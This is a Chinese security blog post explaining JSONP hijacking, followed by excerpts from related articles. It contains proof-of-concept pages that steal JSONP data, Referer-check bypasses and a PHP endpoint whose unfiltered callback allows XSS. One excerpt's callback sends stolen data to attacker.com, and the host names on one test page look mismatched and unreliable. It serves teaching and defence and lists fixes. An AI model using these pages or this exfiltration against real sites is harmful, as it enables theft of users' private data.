浅谈JSONP劫持漏洞

最新推荐文章于 2024-08-02 16:40:33 发布
原创 最新推荐文章于 2024-08-02 16:40:33 发布 · 388 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#json

JSONP

JSONP的全称是JSON with Padding,是一种基于JSON格式来解决跨域请求资源的方案。

由于浏览器同源策略的限制,浏览器只允许XmlHttpRequest请求当前相同(域名、协议、端口)的资源,对请求脚本资源没有限制。

原理:客户端通过请求脚本标签发送跨域请求,然后服务器输出JSON数据并执行回调函数。这种跨域数据输出方式称为JSONP。简单原理说明:使用

可能造成的危险
JSONP数据劫持
没有过滤导致的回调xss
JSONP 劫持示例

# Server request address: http://aphp.test/jsonp/test_jsonp.php?callback=jsonCallback
<?php
header('Content-type: application/json');
$callback = htmlspecialchars($_REQUEST['callback']);
if (!isset($callback) || empty($callback)) {
    $callback = 'callback';
}
$data = array('username'=>'Pmeow-phpoop','email' => '3303003493@google.com');
$json = json_encode($data);
echo $callback."(".$json.")";

# Client request address: http://127.0.0.1/jsonp/jsonp_test.html
<!DOCTYPE html>
<html lang='en'>
<head>
    <title>jsonp</title>
</head>
<body>
    jsonp hijack test
</body>
    <script>
        function jsonCallback(data){
            alert(JSON.stringify(data));
        }
    </script>
    <script src="http://aphp.test/jsonp/test_jsonp.php?callback=jsonCallback"></script>
</html>

JSONP劫持绕过方法

引用过滤(常规)不严格,
例如http://aphp.test/jsonp/test_jsonp.php?callback=jsonCallback 输出数据时,验证Referer

但不幸的是,它只验证关键字 aphp. 测试存在于 Referer 中。
那么攻击者可以构造url:http://127.0.0.1/aphp.test.html或http://127.0.0.1/attack.htm?aphp.测试

构造这样的url发起攻击绕过Referer防御

空引用绕过
有时候开发者在过滤的时候会允许Referer来源为空,因为正常情况下浏览器直接访问一个没有Referer的URL,所以我们有时候可以利用这个特性来绕过

# Use the <meta> tag to implement an empty Referer
<!DOCTYPE html>
<html lang='en'>
<head>
    <meta name="referrer" content="never" charset="utf-8">
    <title>jsonp without Referer</title>
</head>
<body>
    jsonp without Referer hijacking test
</body>
    <script>
        function jsonCallback(data){
            alert(JSON.stringify(data));
        }
    </script>
    <script src="http://aphp.test/jsonp/test_jsonp.php?callback=jsonCallback"></script>
</html>
# Use the <iframe> tag to call the javscript pseudo-protocol to implement an empty Referer call JSON file
<!DOCTYPE html>
<html lang='en'>
<head>
    <title>jsonp without Referer</title>
</head>
<body>
    jsonp without Referer hijacking test
</body>
    <iframe src="javascript:'<script>function jsonCallback(data){alert(JSON.stringify(data));}</script> <script src=http://aphp.test/jsonp/test_jsonp.php? callback=jsonCallback></script>'" frameborder="0"></iframe>
</html>

回调可以定义引起的安全问题
一般开发中,前端可以很方便的调用,一般输出Callback都是可定制的,如果过滤不严格,或者Content-Type设置不合适,就会导致xss

注意:严格来说,如果输出数据也是攻击者可控的话,也可能会造成危害,但是本文强调的是Callback
Test一段代码的输出点,如下

<?php
$callback = $_REQUEST['callback'];
if (!isset($callback) || empty($callback)) {
    $callback = 'callback';
}
$data = array('username'=>'Pmeow-phpoop','email' => '3303003493@google.com');
$json = json_encode($data);
echo $callback."(".$json.")";

测试 HTML 代码

<!DOCTYPE html>
<html lang='en'>

<head>
    <meta name="referrer" content="never" charset="utf-8">
    <title>jsonp hijack</title>
</head>

<body>
    https://v.qq.com jsonp hijacking
</body>
    <!-- Hijacking the user's QQ number can be used for promotion -->
    <script>function jc(data){alert(JSON.stringify(data));}</script>
    <script src="http://node.video.google.com/x/api/get_2029?callback=jc&_=1542534620161"></script>

    <!-- Hijack the user's order data -->
    <script>function jc2(data){alert(JSON.stringify(data));}</script>
    <script src="http://like.video.google.com/fcgi-bin/flw_new?otype=json&sn=FollowServer&cmd=2562&pidx=0&size=30&dtype=0&type=0&callback=jc2&_=1542536629083"></script>
</html>

JSONP 修复

验证 HTTP Referer 标头信息。
将 csrfToken 添加到请求中并在后端验证它。
JSON 格式的标准输出,Content-Type 设置为 (Content-Type : application/json; charset=utf-8)。
严格过滤回调函数名和输出的JSON数据(防止xss)

安全红蓝对抗反制(反捕、画像)
墨痕诉清风的博客
03-09 4140
1.蜜罐 蜜罐可以理解成互联网上的一台主机,它的作用是诱骗攻击者去对自己进行攻击,然后记录攻击者的攻击细节并生成对应的攻击者画像,是当前的一种比较主流的入侵检测系统也是一种主动防御系统。 1.1 放置高交互蜜罐 放置高交互蜜罐,例如一个邮箱服务类型的蜜罐,攻击者有可能会进行邮箱注册,这样子攻击者就主动向我们留下了自己的身份信息。 1.2 放置多个容易被发现的蜜罐 放置多个攻击者可以轻而易举发现的蜜罐,攻击者就会知道自己所在的环境是被蜜罐所包围的,有可能就会放弃进行大范围攻击,变相保护了蜜罐背后的真
【干货】XSS知识总结
hackzkaq的博客
10-27 6940
XSS基础 跨站脚本(英语:Cross-site scripting,通常简称为:XSS)是一种网站应用程序的安全漏洞攻击,是代码注入的一种。它允许恶意用户将代码注入到网页上,其他用户在观看网页时就会受到影响。这类攻击通常包含了HTML以及用户端脚本语言。 XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括Java,VBScript,ActiveX,Flash或者甚至
Jsonp&Cors跨域(同源策略、跨域、劫持漏洞
精品博客,你值得一看~
08-16 1166
CORS)跨域资源共享,其思想是使用自定义的HTTP头部字段让浏览 器与服务器进行沟通,它允许浏览器向跨域服务器发出XMLHttpRequest请求,从而克服AJAX只能同源 使用的限制。CORS的基本原理是当浏览器在进行跨域请求时,会在请求中添加头部origin来表明自己的协议、主 机、端口号,当服务器接到请求并且看到这个origin头部时,如果设置过允许此域名进行访问,就得添 加头部Access-Control-Allow-Origin。
JSON劫持漏洞
W404129262的博客
07-15 1026
项目在运行当中被安全部扫描扫描得到了JSON漏洞。一开始想着是把JSON包提高包的等级,但是还是没有解决掉JSON劫持的问题,安全部扫描后得到了一系列的修复漏洞方式,先把背景和对方提供的解决方案发出来。 这是关于漏洞背景方面 采用JSON文本的数据交互方式由于可以天然的在浏览器中使用,所以随着ajax和web业务的发展得到了广大的发展,各种大型网站都开始使用,包括Yahoo,Google,Tencent,Baidu等等。 但是如果这种交互的方式用来传递敏感的数据,并且传输的时候没有做太多...
渗透测试-JSONP数据劫持漏洞
cdyunaq的博客
03-31 7973
​介绍 JSONPJSON with Padding)是 json 的一种"使用模式",可以让网页从别的域名(网站)那获取资料,即跨域读取数据;它利用的是script标签的 src 属性不受同源策略影响的特性,使网页可以得到从其他来源动态产生的 json 数据,因此可以用来实现跨域读取数据。 更通俗的说法:JSONP 就是利用<script>标签的跨域能力实现跨域数据的访问,请求动态生成的 JavaScript 脚本同时带一个 callback 函数名作为参数。服务端收到请求后,动态生..
JSONP数据劫持漏洞
qq_50854662的博客
04-19 1326
JSONP数据劫持漏洞
CORS配置漏洞/jsonp劫持
weixin_71093833的博客
08-02 2447
cors漏洞简单摘要
浅谈CSRF跨域读取型漏洞JSONP劫持
记录学习,一起进步
03-06 1177
CSRF跨域读取型漏洞JSONP劫持
JSON劫持漏洞分析
Fly_鹏程万里
05-17 5733
什么是JSON劫持单从字面上就可以理解的出来,JSON是一种轻量级的数据交换格式,而劫持就是对数据进行窃取(或者应该称为打劫、拦截比较合适。恶意攻击者通过某些特定的手段,将本应该返回给用户的JSON数据进行拦截,转而将数据发送回给恶意攻击者,这就是JSON劫持的大概含义。一般来说进行劫持JSON数据都是包含敏感信息或者有价值的数据。造成JSON劫持漏洞的成因正所谓无风不起浪,无根不长草,要发动一...
csrf的jsonp利用
07-27
- *1* *2* [浅谈CSRF跨域读取型漏洞JSONP劫持](https://blog.youkuaiyun.com/qq_63701832/article/details/129372608)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_...
【全栈修炼】CORS和CSRF修炼宝典
pingan8787
11-17 723
《全栈修炼》系列 《【全栈修炼】OAuth2修炼宝典》 CORS 和 CSRF 太容易混淆了,看完本文,你就清楚了。 一、CORS 和 CSRF 区别 先看下图: 两者概念完全不同,另外常常我们也会看到 XSS ,这里一起介绍: CORS : Cross Origin Resourse-Sharing 跨站资源共享 CSRF : Cross-Site Request Forgery...
串联高频面试问题,触类旁通,一通百通!
掘金安东尼
07-15 1850
前言 开宗明义,本瓜深知汝之痛点:前端面试知识点太杂,卿总为了面试而面试,忘了记,记了又忘,循环往复,为此叫苦不迭。 来,让本瓜带领各位都稍稍回顾一下,自己曾经在学生时代记忆元素周期表的光辉岁月。 氢、氦、锂、铍、硼、碳、氮、氧、氟、氖、钠、镁、铝、硅、磷、硫、氯、氩、钾、钙、钪、钛、钒、铬、猛、铁、钴、镍、铜、锌… 咱当初记这前三十位元素,是死记硬背的吗?答案是否定的,机智的我们用到了 串联记忆法 。 一定是像这样或类似这样去记: 第一周期:氢 氦 ———— 轻嗨:轻轻的打个了招呼:嗨! 第二周期:锂
JSONP劫持
jiet07的博客
08-30 2219
文章目录概述相关劫持JSONP漏洞的利用过程JSONP漏洞的危害other参考资料 JSONP劫持 概述 引入:因为浏览器为了防止个人信息暴露(cookie等),对浏览器设置了同源策略,这个时候,从不同的域(网站)访问数据需要一个特殊的技术(跨域请求),JSONP应用而生。 JSONP( JSON with Padding)是json的一种“使用模式”,可以让网页从别的域名(网站)那获取资料,即跨域读取数据。 这样就很容易理解,JSONP劫持,就是攻击者attacker通过构造设计一个网站evil(网站中包
JSONP劫持漏洞EXP
weixin_50464560的博客
08-11 604
JSONP EXP 方法一:JavaScript调用 弹窗代码(弹窗JSON数据): <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>JSONP EXP跨域测试</title> </head> <body> <script> function jsoncallback(json){ //new
jsonp劫持漏洞
sunshine19871211的博客
04-14 3380
第一次遇到了jsonp劫持漏洞,并且通过此漏洞绕过token进行成功的csrf攻击,仅以此文进行记录分享。 JSONP 什么是jsonpJsonp(JSON with Padding) 是 json 的一种"使用模式",可以让网页从别的域名(网站)那获取资料,即跨域读取数据。 JSONP的语法和JSON很像,简单来说就是在JSON外部用一个函数包裹着。JSONP基本语法如下: cal...
jsonp劫持漏洞研究与防范
你和萤火虫有两个共同点,在我的眼里都会发光,同时,都已经很多年没见了
08-22 906
文章目录背景知识jsonp同源策略JSONP劫持????栗子防范 背景知识 jsonp Jsonp(JSON with Padding) 是 json 的一种"使用模式",可以让网页从别的域名(网站)那获取资料,即跨域读取数据,也就是说可以通过这个技术,绕过同源策略。 JSONP 由两部分组成:回调函数和数据。回调函数是当响应到来时应该在页面中调用的函数。回调函数的名字一般是在请求中指定的。而数据就是传入回调函数中的 JSON 数据。 同源策略 同源策略(Same Origin Policy),它是由 Ne
json劫持漏洞
RMC131的博客
04-19 486
JSON是一种轻量级的数据交换格式,劫持就对数据进行窃取。攻击者通过某些特定的手段。将本应返回已给用户的JSON数据进行拦截,转发给攻击者。一般劫持JSON数据都是。攻击方法与CSRF类似。需要用户登录账号,在身份是认证没有消除的情况下访问攻击者设计好的页面。进而获取JSON数据,并转发给攻击者。
jsonp劫持
m0_51553670的博客
07-29 1841
JSON指的是JavaScript对象表示法( JavaScript Object Notation)JSON是轻量级的文本数据交换格式JSON是存储和交换文本信息的语法,类似XML但JSON比XML更小、更快、更易解析C、Python、C++、Java、PHP、Go等编程语言都支持JSON几乎所有编程语言都有解析JSON的库,而在JavaScript中,我们可以直接使用JSON,因为JavaScript内置了JSON的解析。
Jsonp劫持
Sentiment的博客
07-25 1227
我们知道,在JSONP跨域中,我们是可以传入一个函数名的参数如callback,然后JSONP端点会根据我们的传参动态生成JSONP数据响应回来。如果JSONP端点对于用于传入的函数名参数callback处理不当,如未正确设置响应包的Content-Type、未对用户输入参数进行有效过滤或转义时,就会导致XSS漏洞的产生。jsonp.php} else {请求后触发xss,此时发现php默认的content-type为text/html。
jsonp劫持利用
最新发布
03-29
### JSONP 劫持原理 JSONPJSON with Padding)是一种通过 `<script>` 标签绕过浏览器同源策略的技术。它的核心机制在于利用了 `<script>` 标签可以加载跨域资源的能力,而这种能力不受同源政策限制。然而,由于 JSONP 的设计缺陷,可能导致安全风险。 #### 原理分析 JSONP 请求通常由服务器返回一段 JavaScript 代码,这段代码会被客户端动态执行。假设存在一个支持 JSONP 的接口 `http://example.com/api?callback=foo`,该接口会返回如下形式的数据: ```javascript foo({"key": "value"}); ``` 这里的 `foo` 是客户端指定的一个函数名,用于处理返回的结果。如果攻击者能够控制回调函数的内容或者用户的访问环境,则可能引发安全性问题。 具体来说,JSONP 劫持主要依赖于以下几个条件: 1. **目标网站提供 JSONP 支持**:即允许用户自定义 callback 参数。 2. **受害者登录状态可被利用**:例如,攻击者能获取到受害者的 Cookie 或其他认证信息。 3. **恶意脚本注入**:攻击者可以在第三方页面中嵌入 `<script>` 标签指向目标 API 地址,并设置自己的回调函数名称。 一旦上述条件满足,攻击者就可以通过构造合适的 URL 和回调函数窃取敏感数据[^1]。 --- ### 利用方式 以下是典型的 JSONP 劫持过程描述: 1. **准备阶段** - 攻击者创建一个网页,在其中加入以下 HTML 片段: ```html <script> function maliciousCallback(data) { alert('Stolen data: ' + JSON.stringify(data)); // 将盗取的信息发送至远程服务器 var img = new Image(); img.src = "http://attacker.com/log?" + encodeURIComponent(JSON.stringify(data)); } </script> <script src="http://vulnerable-site.com/api?callback=maliciousCallback"></script> ``` 2. **触发阶段** - 当用户访问此恶意网页时,浏览器会向 `http://vulnerable-site.com/api?callback=maliciousCallback` 发起请求。 - 如果用户已登录到 `vulnerable-site.com` 并携带有效 Session ID (Cookie),那么响应将包含受保护的数据。 3. **后果** - 返回的数据会被传递给 `maliciousCallback()` 函数并被执行。 - 此过程中,敏感信息可能会泄露给攻击者。 需要注意的是,现代 Web 应用已经逐渐淘汰了纯 JSONP 方案,转而使用 CORS 来解决跨域资源共享需求,从而减少此类安全隐患的发生概率[^5]。 --- ### 防护措施建议 为了防止 JSONP 被滥用造成危害,可以从多个角度采取防护手段: - 不再对外公开支持任意参数命名的 JSONP 接口; - 对所有 GET 请求实施严格的 CSRF Token 校验; - 使用 HTTPS 加密通信链路以降低中间人攻击的风险; - 教育开发者避免在生产环境中暴露未授权即可调用的服务端点。 ---
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Q shen

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值